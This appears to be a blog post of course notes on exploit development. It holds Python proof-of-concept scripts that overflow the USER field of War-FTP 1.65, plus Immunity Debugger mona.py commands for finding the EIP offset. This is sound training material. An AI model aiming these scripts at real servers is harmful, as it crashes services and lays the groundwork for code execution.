Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
*Give the program too much input in the username (USER) field *Saved return pointer will be overwritten with our attack controlled input I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow #!/usr/bin/python import socket buffer = "A" * 1100 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.5.44',21))* response = s.recv(1024) print response s.send('USER ' + buffer + '\r\n') response = s.recv(1024) print response s.send('PASS PASSWORD\r\n') s.close() II. Immunity Debugger -> Attach to the Process III. Mona.py A exploit development plugin for Immunity Debugger and WinDGB by the Corelan Team. Setup logging:!mona config -set workingfolder C:\logs\%p Identifying the Overwrite !mona pattern_create 1100 IV. Mona Findmsp Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern Verifying Offsets #!/usr/bin/python import socket buffer = "A" * 485 + "B" * 4 + "C" * 611 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.20.10',21)) response = s.recv(1024) print response s.send('USER ' + buffer + '\r\n') response = s.recv(1024) print response s.send('PASS PASSWORD\r\n') s.close()
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |